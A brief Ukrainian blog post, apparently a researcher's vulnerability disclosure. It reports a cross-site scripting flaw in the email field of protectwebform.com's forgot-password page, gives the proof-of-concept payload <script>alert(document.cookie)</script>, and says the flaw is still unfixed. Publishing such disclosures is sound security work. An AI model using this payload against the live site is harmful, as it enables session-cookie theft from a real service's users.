Уразливість на www.protectwebform.com
20:05 04.12.200826.05.2008
У жовтні, 24.10.2007, я знайшов Cross-Site Scripting уразливість на секюріті проекті http://www.protectwebform.com. Про що найближчим часом сповіщу адміністрацію проекту.
Детальна інформація про уразливість з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.
04.12.2008
XSS:
POST запит на сторінці http://www.protectwebform.com/ forgotpassword
<script>alert(document.cookie)</script>
В полі: email.
XSS через GET:
Дана уразливість досі не виправлена.